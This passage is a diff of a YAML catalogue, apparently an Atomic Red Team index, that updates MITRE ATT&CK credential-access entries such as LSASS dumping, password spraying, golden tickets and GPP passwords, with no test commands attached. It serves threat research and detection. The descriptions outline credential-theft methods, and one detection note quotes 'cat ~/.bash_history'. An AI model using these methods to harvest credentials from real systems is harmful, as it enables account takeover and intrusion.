+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45716,12 +46481,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45758,6 +46522,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45770,7 +46535,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45820,12 +46585,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45851,6 +46615,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45866,18 +46631,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45904,14 +46669,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45922,13 +46684,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45942,6 +46704,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45952,12 +46715,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46032,7 +46795,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -46078,7 +46840,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46113,16 +46875,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -46132,21 +46892,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -46195,33 +46957,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46236,25 +46976,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -46328,7 +47086,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -46390,11 +47147,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46443,6 +47199,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -46451,6 +47208,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46461,13 +47219,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -46523,44 +47282,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46577,25 +47303,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46670,11 +47425,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46718,11 +47472,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46746,8 +47499,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46763,11 +47516,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46778,11 +47530,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46792,16 +47546,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46839,13 +47593,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46854,6 +47605,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46861,11 +47613,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -46883,13 +47635,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -46902,6 +47651,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -46915,12 +47665,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -46952,17 +47703,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -47035,12 +47783,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47049,6 +47796,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -47067,18 +47815,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -47102,13 +47850,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
